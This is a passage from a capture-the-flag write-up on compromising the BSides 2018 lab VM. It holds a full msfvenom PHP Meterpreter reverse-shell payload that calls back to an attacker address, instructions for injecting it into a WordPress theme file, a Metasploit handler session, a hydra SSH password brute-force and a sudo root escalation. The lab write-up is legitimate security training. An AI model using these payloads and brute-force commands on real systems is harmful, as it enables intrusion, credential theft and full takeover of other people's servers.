Incredibly after 20 minutes, wpscan found a valid combination. That’s awesome! Using the password enigma, we can log into WordPress as john.

Then from here, it doesn’t take much to get a reverse shell. We just need to inject a PHP shellcode into one of the WordPress themes’ files and we should be good to go.

So, let’s generate a Meterpreter PHP shellcode with msfvenom:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.10.4 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.10.4'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Then, go to appearance -> editor in the WordPress panel and modify a PHP file, such as for example the 404.php file, and add the meterpreter php shellcode.

At this point, we can save and run a multi/handler in our Kali machine.

root@kali:~# msfconsole
[-] ***rTing the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***


_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/


=[ metasploit v5.0.3-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.10.4
LHOST => 192.168.10.4
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.10.4:4444 

Once the multi/handler is listening, we can simply go to the http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/404.php URL and we should get back a shell.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.10.4:4444
[*] Sending stage (38247 bytes) to 192.168.10.3
[*] Meterpreter session 1 opened (192.168.10.4:4444 -> 192.168.10.3:41075) at 2019-02-19 13:07:38 -0800

meterpreter > sysinfo
Computer : bsides2018
OS : Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686
Meterpreter : php/linux

Boom, we are in the machine! At this point, for some reason I couldn’t get any further, so I decided to turn my attention to SSH since the clock was ticking. Now, quick side note, on Part 2 of this video I will show you the steps I took to get root from here, so if you are interested on that, make sure to subscribe and stay tuned. 🙂

Having said that. SSH is always a tricky service in capture the flags. You never know if it is completely exploitable or it is just there to make you lose some time.

Since, we found a list of usernames, the first step is to try to log in using those usernames.

root@kali:~/pentest# cat users.txt.bk
abatchy
john
mai
anne
doomguy

root@kali:~/pentest# ssh abatchy@192.168.10.3
abatchy@192.168.10.3: Permission denied (publickey).
root@kali:~/pentest# ssh john@192.168.10.3
john@192.168.10.3: Permission denied (publickey).
root@kali:~/pentest# ssh mai@192.168.10.3
mai@192.168.10.3: Permission denied (publickey).
root@kali:~/pentest# ssh anne@192.168.10.3
anne@192.168.10.3's password:
Permission denied, please try again.
anne@192.168.10.3's password:

root@kali:~/pentest# ssh doomguy@192.168.10.3
doomguy@192.168.10.3: Permission denied (publickey).

Apparently, there is only one account that allows you to login with a password. The account of anne. So, let’s see if we are lucky with hydra.

hydra -l anne -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -f ssh://192.168.10.4


root@kali:~/pentest# hydra -l anne -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -f ssh://192.168.10.4
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-02-10 16:17:20
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344402 login tries (l:1/p:14344402), ~3586101 tries per task
[DATA] attacking ssh://192.168.10.4:22/
[22][ssh] host: 192.168.10.4 login: anne password: princess
[STATUS] attack finished for 192.168.10.4 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-02-10 16:17:49

Yes! It worked! We now have access to the system as anne as well. And surprise surprise, anne can be used to get to root through sudo.

anne@bsides2018:~$ sudo -l
[sudo] password for anne:
Matching Defaults entries for anne on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User anne may run the following commands on this host:
(ALL : ALL) ALL

What a lovely misconfiguration. Using sudo -s, we are able to escalate to root.

anne@bsides2018:~$ sudo -s
root@bsides2018:~# ls
root@bsides2018:~# ls /root
flag.txt
root@bsides2018:~# cat /root/flag.txt
Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?

@abatchy17

root@bsides2018:~#

Game over! If you have any question, do not hesitate to write me on Twitter (@GianniGnesa). 😉